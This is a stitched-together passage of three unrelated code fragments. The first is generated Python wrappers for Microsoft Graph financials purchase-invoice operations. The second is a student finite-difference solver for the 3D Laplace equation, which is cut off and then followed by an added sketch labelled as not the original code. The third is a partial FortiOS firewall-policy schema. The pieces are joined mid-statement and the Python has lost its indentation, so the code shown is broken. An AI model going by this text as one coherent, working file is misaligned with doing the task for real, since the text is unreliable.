if_match=if_match)
def financials_financial_company_purchase_invoice_line_delete_item(client,
company_id,
purchase_invoice_line_id,
if_match=None):
return client.delete_item(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
if_match=if_match)
def financials_financial_company_purchase_invoice_line_show_account(client,
company_id,
purchase_invoice_line_id,
select=None,
expand=None):
return client.get_account(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
select=select,
expand=expand)
def financials_financial_company_purchase_invoice_line_show_item(client,
company_id,
purchase_invoice_line_id,
select=None,
expand=None):
return client.get_item(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
select=select,
expand=expand)
def financials_financial_company_purchase_invoice_line_update_account(client,
company_id,
purchase_invoice_line_id,
id_=None,
blocked=None,
category=None,
display_name=None,
last_modified_date_time=None,
number=None,
sub_category=None):
body = {}
body['id'] = id_
body['blocked'] = blocked
body['category'] = category
body['display_name'] = display_name
body['last_modified_date_time'] = last_modified_date_time
body['number'] = number
body['sub_category'] = sub_category
return client.update_account(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
body=body)
def financials_financial_company_purchase_invoice_line_update_item(client,
company_id,
purchase_invoice_line_id,
id_=None,
base_unit_of_measure_id=None,
blocked=None,
display_name=None,
gtin=None,
inventory=None,
item_category_code=None,
item_category_id=None,
last_modified_date_time=None,
number=None,
price_includes_tax=None,
tax_group_code=None,
tax_group_id=None,
type_=None,
unit_cost=None,
unit_price=None,
item_category=None,
picture=None):
body = {}
body['id'] = id_
body['base_unit_of_measure_id'] = base_unit_of_measure_id
body['blocked'] = blocked
body['display_name'] = display_name
body['gtin'] = gtin
body['inventory'] = inventory
body['item_category_code'] = item_category_code
body['item_category_id'] = item_category_id
body['last_modified_date_time'] = last_modified_date_time
body['number'] = number
body['price_includes_tax'] = price_includes_tax
body['tax_group_code'] = tax_group_code
body['tax_group_id'] = tax_group_id
body['type'] = type_
body['unit_cost'] = unit_cost
body['unit_price'] = unit_price
body['item_category'] = item_category
body['picture'] = picture
return client.update_item(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
body=body)
def financials_financial_company_purchase_invoice_line_item_create_picture(client,
company_id,
purchase_invoice_line_id,
content_type,
id_=None,
content=None,
height=None,
width=None):
body = {}
body['id'] = id_
body['content'] = content
body['content_type'] = content_type
body['height'] = height
body['width'] = width
return client.create_picture(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
body=body)
def financials_financial_company_purchase_invoice_line_item_delete_item_category(client,
company_id,
purchase_invoice_line_id,
if_match=None):
return client.delete_item_category(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
if_match=if_match)
def financials_financial_company_purchase_invoice_line_item_delete_picture(client,
company_id,
purchase_invoice_line_id,
picture_id,
if_match=None):
return client.delete_picture(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
picture_id=picture_id,
if_match=if_match)
def financials_financial_company_purchase_invoice_line_item_list_picture(client,
company_id,
purchase_invoice_line_id,
orderby=None,
select=None,
expand=None):
return client.list_picture(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
orderby=orderby,
select=select,
expand=expand)
def financials_financial_company_purchase_invoice_line_item_set_picture_content(client,
company_id,
purchase_invoice_line_id,
picture_id,
data):
return client.set_picture_content(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
picture_id=picture_id,
data=data)
def financials_financial_company_purchase_invoice_line_item_show_item_category(client,
company_id,
purchase_invoice_line_id,
select=None,
expand=None):
return client.get_item_category(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
select=select,
expand=expand)
def financials_financial_company_purchase_invoice_line_item_show_picture(client,
company_id,
purchase_invoice_line_id,
picture_id,
select=None,
expand=None):
return client.get_picture(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
picture_id=picture_id,
select=select,
expand=expand)
def financials_financial_company_purchase_invoice_line_item_show_picture_content(client,
company_id,
purchase_invoice_line_id,
picture_id):
return client.get_picture_content(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
picture_id=picture_id)
def financials_financial_company_purchase_invoice_line_item_update_item_category(client,
company_id,
purchase_invoice_line_id,
id_=None,
code=None,
display_name=None,
last_modified_date_time=None):
body = {}
body['id'] = id_
body['code'] = code
body['display_name'] = display_name
body['last_modified_date_time'] = last_modified_date_time
return client.update_item_category(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
body=body)
def financials_financial_company_purchase_invoice_line_item_update_picture(client,
company_id,
purchase_invoice_line_id,
picture_id,
content_type,
id_=None,
content=None,
height=None,
width=None):
body = {}
body['id'] = id_
body['content'] = content
body['content_type'] = content_type
body['height'] = height
body['width'] = width
return client.update_picture(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
picture_id=picture_id,
body=body)
def financials_financial_company_purchase_invoice_create_purchase_invoice_line(client,
company_id,
purchase_invoice_id,
id_=None,
account_id=None,
amount_excluding_tax=None,
amount_including_tax=None,
description=None,
discount_amount=None,
discount_applied_before_tax=None,
discount_percent=None,
document_id=None,
expected_receipt_date=None,
invoice_discount_allocation=None,
item_id=None,
line_type=None,
net_amount=None,
net_amount_including_tax=None,
net_tax_amount=None,
quantity=None,
sequence=None,
tax_code=None,
tax_percent=None,
total_tax_amount=None,
unit_cost=None,
account=None,
microsoft_graph_entity_id=None,
base_unit_of_measure_id=None,
blocked=None,
display_name=None,
gtin=None,
inventory=None,
item_category_code=None,
item_category_id=None,
last_modified_date_time=None,
number=None,
price_includes_tax=None,
tax_group_code=None,
tax_group_id=None,
type_=None,
number_unit_cost=None,
unit_price=None,
item_category=None,
picture=None):
body = {}
body['id'] = id_
body['account_id'] = account_id
body['amount_excluding_tax'] = amount_excluding_tax
body['amount_including_tax'] = amount_including_tax
body['description'] = description
body['discount_amount'] = discount_amount
body['discount_applied_before_tax'] = discount_applied_before_tax
body['discount_percent'] = discount_percent
body['document_id'] = document_id
body['expected_receipt_date'] = expected_receipt_date
body['invoice_discount_allocation'] = invoice_discount_allocation
body['item_id'] = item_id
body['line_type'] = line_type
body['net_amount'] = net_amount
body['net_amount_including_tax'] = net_amount_including_tax
body['net_tax_amount'] = net_tax_amount
body['quantity'] = quantity
body['sequence'] = sequence
body['tax_code'] = tax_code
body['tax_percent'] = tax_percent
body['total_tax_amount'] = total_tax_amount
body['unit_cost'] = unit_cost
body['account'] = account
body['item'] = {}
body['item']['id'] = microsoft_graph_entity_id
body['item']['base_unit_of_measure_id'] = base_unit_of_measure_id
body['item']['blocked'] = blocked
body['item']['display_name'] = display_name
body['item']['gtin'] = gtin
body['item']['inventory'] = inventory
body['item']['item_category_code'] = item_category_code
body['item']['item_category_id'] = item_category_id
body['item']['last_modified_date_time'] = last_modified_date_time
body['item']['number'] = number
body['item']['price_includes_tax'] = price_includes_tax
body['item']['tax_group_code'] = tax_group_code
body['item']['tax_group_id'] = tax_group_id
body['item']['type'] = type_
body['item']['unit_cost'] = number_unit_cost
body['item']['unit_price'] = unit_price
body['item']['item_category'] = item_category
body['item']['picture'] = picture
return client.create_purchase_invoice_lines(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
body=body)
def financials_financial_company_purchase_invoice_delete_currency(client,
company_id,
purchase_invoice_id,
if_match=None):
return client.delete_currency(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
if_match=if_match)
def financials_financial_company_purchase_invoice_delete_purchase_invoice_line(client,
company_id,
purchase_invoice_id,
purchase_invoice_line_id,
if_match=None):
return client.delete_purchase_invoice_lines(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
purchase_invoice_line_id=purchase_invoice_line_id,
if_match=if_match)
def financials_financial_company_purchase_invoice_delete_vendor(client,
company_id,
purchase_invoice_id,
if_match=None):
return client.delete_vendor(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
if_match=if_match)
def financials_financial_company_purchase_invoice_list_purchase_invoice_line(client,
company_id,
purchase_invoice_id,
orderby=None,
select=None,
expand=None):
return client.list_purchase_invoice_lines(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
orderby=orderby,
select=select,
expand=expand)
def financials_financial_company_purchase_invoice_post(client,
company_id,
purchase_invoice_id):
return client.post(company_id=company_id,
purchase_invoice_id=purchase_invoice_id)
def financials_financial_company_purchase_invoice_show_currency(client,
company_id,
purchase_invoice_id,
select=None,
expand=None):
return client.get_currency(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
select=select,
expand=expand)
def financials_financial_company_purchase_invoice_show_purchase_invoice_line(client,
company_id,
purchase_invoice_id,
purchase_invoice_line_id,
select=None,
expand=None):
return client.get_purchase_invoice_lines(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
purchase_invoice_line_id=purchase_invoice_line_id,
select=select,
expand=expand)
def financials_financial_company_purchase_invoice_show_vendor(client,
company_id,
purchase_invoice_id,
select=None,
expand=None):
return client.get_vendor(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
select=select,
expand=expand)
def financials_financial_company_purchase_invoice_update_currency(client,
company_id,
purchase_invoice_id,
id_=None,
amount_decimal_places=None,
amount_rounding_precision=None,
code=None,
display_name=None,
last_modified_date_time=None,
symbol=None):
body = {}
body['id'] = id_
body['amount_decimal_places'] = amount_decimal_places
body['amount_rounding_precision'] = amount_rounding_precision
body['code'] = code
body['display_name'] = display_name
body['last_modified_date_time'] = last_modified_date_time
body['symbol'] = symbol
return client.update_currency(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
body=body)
def financials_financial_company_purchase_invoice_update_purchase_invoice_line(client,
company_id,
purchase_invoice_id,
purchase_invoice_line_id,
id_=None,
account_id=None,
amount_excluding_tax=None,
amount_including_tax=None,
description=None,
discount_amount=None,
discount_applied_before_tax=None,
discount_percent=None,
document_id=None,
expected_receipt_date=None,
invoice_discount_allocation=None,
item_id=None,
line_type=None,
net_amount=None,
net_amount_including_tax=None,
net_tax_amount=None,
quantity=None,
sequence=None,
tax_code=None,
tax_percent=None,
total_tax_amount=None,
unit_cost=None,
account=None,
microsoft_graph_entity_id=None,
base_unit_of_measure_id=None,
blocked=None,
display_name=None,
gtin=None,
inventory=None,
item_category_code=None,
item_category_id=None,
last_modified_date_time=None,
number=None,
price_includes_tax=None,
tax_group_code=None,
tax_group_id=None,
type_=None,
number_unit_cost=None,
unit_price=None,
item_category=None,
picture=None):
body = {}
body['id'] = id_
body['account_id'] = account_id
body['amount_excluding_tax'] = amount_excluding_tax
body['amount_including_tax'] = amount_including_tax
body['description'] = description
body['discount_amount'] = discount_amount
body['discount_applied_before_tax'] = discount_applied_before_tax
body['discount_percent'] = discount_percent
body['document_id'] = document_id
body['expected_receipt_date'] = expected_receipt_date
body['invoice_discount_allocation'] = invoice_discount_allocation
body['item_id'] = item_id
body['line_type'] = line_type
body['net_amount'] = net_amount
body['net_amount_including_tax'] = net_amount_including_tax
body['net_tax_amount'] = net_tax_amount
body['quantity'] = quantity
body['sequence'] = sequence
body['tax_code'] = tax_code
body['tax_percent'] = tax_percent
body['total_tax_amount'] = total_tax_amount
body['unit_cost'] = unit_cost
body['account'] = account
body['item'] = {}
body['item']['id'] = microsoft_graph_entity_id
body['item']['base_unit_of_measure_id'] = base_unit_of_measure_id
body['item']['blocked'] = blocked
body['item']['display_name'] = display_name
body['item']['gtin'] = gtin
body['item']['inventory'] = inventory
body['item']['item_category_code'] = item_category_code
body['item']['item_category_id'] = item_category_id
body['item']['last_modified_date_time'] = last_modified_date_time
body['item']['number'] = number
body['item']['price_includes_tax'] = price_includes_tax
body['item']['tax_group_code'] = tax_group_code
body['item']['tax_group_id'] = tax_group_id
body['item']['type'] = type_
body['item']['unit_cost'] = number_unit_cost
body['item']['unit_price'] = unit_price
body['item']['item_category'] = item_category
body['item']['picture'] = picture
return client.update_purchase_invoice_lines(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
purchase_invoice_line_id=purchase_invoice_line_id,
body=body)
def financials_financial_company_purchase_invoice_update_vendor(client,
company_id,
purchase_invoice_id,
id_=None,
address=None,
balance=None,
blocked=None,
currency_code=None,
currency_id=None,
display_name=None,
email=None,
last_modified_date_time=None,
number=None,
payment_method_id=None,
payment_terms_id=None,
phone_number=None,
tax_liable=None,
tax_registration_number=None,
website=None,
currency=None,
payment_method=None,
payment_term=None,
picture=None):
body = {}
body['id'] = id_
body['address'] = address
body['balance'] = balance
body['blocked'] = blocked
body['currency_code'] = currency_code
body['currency_id'] = currency_id
body['display_name'] = display_name
body['email'] = email
body['last_modified_date_time'] = last_modified_date_time
body['number'] = number
body['payment_method_id'] = payment_method_id
body['payment_terms_id'] = payment_terms_id
body['phone_number'] = phone_number
body['tax_liable'] = tax_liable
body['tax_registration_number'] = tax_registration_number
body['website'] = website
body['currency'] = currency
body['payment_method'] = payment_method
body['payment_term'] = payment_term
body['picture'] = picture
return client.update_vendor(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
body=body)
def financials_financial_company_purchase_invoice_purchase_invoice_line_delete_account(client,
company_id,
purchase_invoice_id,
purchase_invoice_line_id,
if_match=None):
return client.delete_account(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
                                 purchase_invoice_line_id=purchase_invoice_line_id,
                                 if_match=if_match)
# coding=utf-8
"""
<NAME>, CC3501-Tarea3a, 2020-1
Finite Differences for Partial Differential Equations
Solving the Laplace equation in 3D with Dirichlet and
Neumann border conditions over a parallelepiped domain.
"""
import numpy as np
import sys
import json_reader as r
import scipy.sparse as sparse
import scipy.sparse.linalg as linalg
import matplotlib.pyplot as plt
# Input
problem_setup_name = sys.argv[1] # Problem setup file
problem_setup_dict = r.jsonToDict(problem_setup_name) # Dictionary for the problem setup constants
# Problem setup
H = problem_setup_dict["height"]
W = problem_setup_dict["width"]
L = problem_setup_dict["lenght"]
# Discretization step
h = 0.1 # 0.125
# Neumann conditions:
F = problem_setup_dict["window_loss"]  # at the right, left, far and near faces
# Boundary Dirichlet Conditions:
heater_a = problem_setup_dict["heater_a"]
heater_b = problem_setup_dict["heater_b"]
T = problem_setup_dict["ambient_temperature"]
fileName = problem_setup_dict["filename"]
# Path
path = "Solutions/"
# Number of unknowns
# Only the top side and the heaters at the bottom are known (Dirichlet condition)
# right, left, far and near are unknown (Neumann condition)
nx = int(W / h) + 1
ny = int(L / h) + 1
nz = int(H / h)
# In this case, the domain is an aquarium shaped like a parallelepiped
N = nx * ny * nz
# We define functions to convert the indices from i,j,k to P and vice versa.
# i,j,k index the discrete domain in 3D.
# P parametrizes those i,j,k; this way we can tidy the unknowns
# into a column vector and use standard linear algebra.
def getP(i,j,k):
return k*(nx*ny) + j*nx + i
def getIJK(P):
k = P // (nx*ny)
i = P % nx
j = (P // nx) -k*ny
return (i, j, k)
"""
# This code is useful to debug the indexation functions above
print("="*10)
print(getP(0,0,0), getIJK(0))
print(getP(30,50,0), getIJK(1580))
print(getP(30,50,1), getIJK(3161))
print(getP(0,0,2), getIJK(3162))
print("="*10)
import sys
sys.exit(0)
"""
# In this matrix we will write all the coefficients of the unknowns
#A = np.zeros((N,N))
A = sparse.lil_matrix((N,N)) # We use a sparse matrix in order to spare memory, since it has many 0's
# In this vector we will write all the right side of the equations
b = np.zeros((N,))
# Note: writing an equation is equivalent to writing a row in the matrix system
# We iterate over each point inside the domain
# Each point has an equation associated
# The equation is different depending on the point location inside the domain
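# Added for clarity (a sketch of the discretization, not in the original source):
# For an interior node, the 7-point Laplacian stencil with step h gives
#   u[i+1,j,k] + u[i-1,j,k] + u[i,j+1,k] + u[i,j-1,k] + u[i,j,k+1] + u[i,j,k-1] - 6*u[i,j,k] = 0,
# which is why interior rows get six 1's, a -6 on the diagonal and b[P] = 0.
# On a face with a prescribed flux F (Neumann), the node just outside the domain
# (a "ghost" node) is eliminated with a centered difference of the flux condition,
# e.g. at i = nx-1:  u[nx,j,k] = u[nx-2,j,k] +/- 2*h*F (sign depends on the flux convention).
# Substituting it back doubles the inner neighbour's coefficient (hence the 2's)
# and moves the 2*h*F term to the right-hand side (hence b[P] = -2*h*F); where two
# such faces meet along an edge, the contributions add up to -4*h*F.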
for k in range(0, nz):
for j in range(0, ny):
for i in range(0, nx):
# We will write the equation associated with row P
P = getP(i, j, k)
# We obtain indices of the other coefficients
P_right = getP(i+1, j, k)
P_left = getP(i-1, j, k)
P_far = getP(i, j+1, k)
P_near = getP(i, j-1, k)
P_up = getP(i, j, k+1)
P_down = getP(i, j, k-1)
# Depending on the location of the point, the equation is different:
# Interior
if (1 <= i) and (i <= nx - 2) and (1 <= j) and (j <= ny - 2) and (1 <= k) and (k <= nz-2):
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(1))
A[P, P_right] = 1
A[P, P_left] = 1
A[P, P_far] = 1
A[P, P_near] = 1
A[P, P_up] = 1
A[P, P_down] = 1
A[P, P] = -6
b[P] = 0
# Right
elif i == nx-1 and (1 <= j) and (j <= ny - 2) and (1 <= k) and (k <= nz-2):
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(2))
A[P, P_left] = 2
A[P, P_far] = 1
A[P, P_near] = 1
A[P, P_up] = 1
A[P, P_down] = 1
A[P, P] = -6
b[P] = -2 * h * F
# Left
elif i == 0 and (1 <= j) and (j <= ny - 2) and (1 <= k) and (k <= nz-2):
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(3))
A[P, P_right] = 2
A[P, P_far] = 1
A[P, P_near] = 1
A[P, P_up] = 1
A[P, P_down] = 1
A[P, P] = -6
b[P] = -2 * h * F
# Far
elif (1 <= i) and (i <= nx-2) and j == ny-1 and (1 <= k) and (k <= nz-2):
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(4))
A[P, P_right] = 1
A[P, P_left] = 1
A[P, P_near] = 2
A[P, P_up] = 1
A[P, P_down] = 1
A[P, P] = -6
b[P] = -2 * h * F
# Near
elif (1 <= i) and (i <= nx-2) and j == 0 and (1 <= k) and (k <= nz-2):
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(5))
A[P, P_right] = 1
A[P, P_left] = 1
A[P, P_far] = 2
A[P, P_up] = 1
A[P, P_down] = 1
A[P, P] = -6
b[P] = -2 * h * F
# Top
elif (1 <= i) and (i <= nx - 2) and (1 <= j) and (j <= ny-2) and k == nz-1:
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(6))
A[P, P_right] = 1
A[P, P_left] = 1
A[P, P_far] = 1
A[P, P_near] = 1
A[P, P_down] = 1
A[P, P] = -6
b[P] = -T
# heater_a
elif (nx//3 <= i) and (i <= 2*nx//3) and (3*ny//5 <= j) and (j <= 4*ny//5) and k == 0:
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(8))
A[P, P_right] = 0
A[P, P_left] = 0
A[P, P_far] = 0
A[P, P_near] = 0
A[P, P_up] = 0
A[P, P] = 1
b[P] = heater_a
# heater_b
elif (nx//3 <= i) and (i <= 2*nx//3) and (ny//5 <= j) and (j <= 2*ny//5) and k == 0:
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(9))
A[P, P_right] = 0
A[P, P_left] = 0
A[P, P_far] = 0
A[P, P_near] = 0
A[P, P_up] = 0
A[P, P] = 1
b[P] = heater_b
# Bottom
elif (1 <= i) and (i <= nx - 2) and (1 <= j) and (j <= ny-2) and k == 0:
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(7))
A[P, P_right] = 1
A[P, P_left] = 1
A[P, P_far] = 1
A[P, P_near] = 1
A[P, P_up] = 2
A[P, P] = -6
b[P] = 0
#---------------------------------------------------------------------------------------------------
# Edges:
# Right bottom
elif i == nx-1 and (1 <= j) and (j <= ny - 2) and k == 0:
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(10))
A[P, P_left] = 2
A[P, P_far] = 1
A[P, P_near] = 1
A[P, P_up] = 2
A[P, P] = -6
b[P] = -2 * h * F
# Left bottom
elif i == 0 and (1 <= j) and (j <= ny - 2) and k == 0:
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(11))
A[P, P_right] = 2
A[P, P_far] = 1
A[P, P_near] = 1
A[P, P_up] = 2
A[P, P] = -6
b[P] = -2 * h * F
# Far bottom
elif (1 <= i) and (i <= nx-2) and j == ny-1 and k == 0:
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(12))
A[P, P_right] = 1
A[P, P_left] = 1
A[P, P_near] = 2
A[P, P_up] = 2
A[P, P] = -6
b[P] = -2 * h * F
# Near bottom
elif (1 <= i) and (i <= nx-2) and j == 0 and k == 0:
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(13))
A[P, P_right] = 1
A[P, P_left] = 1
A[P, P_far] = 2
A[P, P_up] = 2
A[P, P] = -6
b[P] = -2 * h * F
# Right far
elif i == nx-1 and j == ny-1 and (1 <= k) and (k <= nz-2):
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(14))
A[P, P_left] = 2
A[P, P_near] = 2
A[P, P_up] = 1
A[P, P_down] = 1
A[P, P] = -6
b[P] = -4 * h * F
# Left far
elif i == 0 and j == ny-1 and (1 <= k) and (k <= nz-2):
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(15))
A[P, P_right] = 2
A[P, P_near] = 2
A[P, P_up] = 1
A[P, P_down] = 1
A[P, P] = -6
b[P] = -4 * h * F
# Right near
elif i == nx-1 and j == 0 and (1 <= k) and (k <= nz-2):
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(16))
                A[P, P_left] = 2
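# --- Illustrative continuation (a sketch; the original sample is truncated here) ---
# After the remaining edge and corner branches have filled A and b, the sparse
# system A x = b would typically be solved and the flat vector mapped back onto
# the (i, j, k) grid. The variable names reuse the ones defined above; the
# np.save() call and output location are assumptions, not the author's code.
A_csc = A.tocsc()  # lil_matrix is convenient for assembly, CSC is better for solving
x = linalg.spsolve(A_csc, b)
u = np.zeros((nx, ny, nz))
for P in range(N):
    i, j, k = getIJK(P)
    u[i, j, k] = x[P]
np.save(path + fileName, u)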
True,
"v6.0.11": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"name": {
"type": "string",
"revisions": {
"v6.4.4": True,
"v7.0.0": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": False
}
},
"sctp_filter_profile": {
"type": "string",
"revisions": {
"v7.0.1": True
}
},
"scan_botnet_connections": {
"type": "string",
"options": [
{
"value": "disable",
"revisions": {
"v6.0.11": True,
"v6.0.0": True,
"v6.0.5": True
}
},
{
"value": "block",
"revisions": {
"v6.0.11": True,
"v6.0.0": True,
"v6.0.5": True
}
},
{
"value": "monitor",
"revisions": {
"v6.0.11": True,
"v6.0.0": True,
"v6.0.5": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": False,
"v6.0.5": True,
"v6.4.4": False,
"v7.0.1": False,
"v6.4.0": False,
"v6.4.1": False,
"v6.2.0": False,
"v6.2.3": False,
"v6.2.5": False,
"v6.2.7": False,
"v6.0.11": True
}
},
"internet_service_id": {
"type": "list",
"children": {
"id": {
"type": "integer",
"revisions": {
"v6.0.0": True,
"v6.0.5": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
},
"revisions": {
"v6.0.0": True,
"v7.0.0": False,
"v6.0.5": True,
"v6.4.4": False,
"v7.0.1": False,
"v6.4.0": False,
"v6.4.1": False,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"dstaddr_negate": {
"type": "string",
"options": [
{
"value": "enable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "disable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"webcache_https": {
"type": "string",
"options": [
{
"value": "disable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "enable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"ips_sensor": {
"type": "string",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"ztna_ems_tag": {
"type": "list",
"children": {
"name": {
"type": "string",
"revisions": {
"v7.0.1": True,
"v7.0.0": True
}
}
},
"revisions": {
"v7.0.1": True,
"v7.0.0": True
}
},
"ssh_policy_redirect": {
"type": "string",
"options": [
{
"value": "enable",
"revisions": {
"v7.0.1": True,
"v7.0.0": True,
"v6.4.4": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True
}
},
{
"value": "disable",
"revisions": {
"v7.0.1": True,
"v7.0.0": True,
"v6.4.4": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True
}
}
],
"revisions": {
"v7.0.1": True,
"v7.0.0": True,
"v6.4.4": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True
}
},
"internet_service_name": {
"type": "list",
"children": {
"name": {
"type": "string",
"revisions": {
"v6.4.4": True,
"v7.0.0": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True
}
}
},
"revisions": {
"v6.4.4": True,
"v7.0.0": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True
}
},
"internet_service_group": {
"type": "list",
"children": {
"name": {
"type": "string",
"revisions": {
"v7.0.1": True,
"v7.0.0": True,
"v6.4.4": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True
}
}
},
"revisions": {
"v7.0.1": True,
"v7.0.0": True,
"v6.4.4": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True
}
},
"internet_service": {
"type": "string",
"options": [
{
"value": "enable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "disable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"action": {
"type": "string",
"options": [
{
"value": "accept",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "deny",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "redirect",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
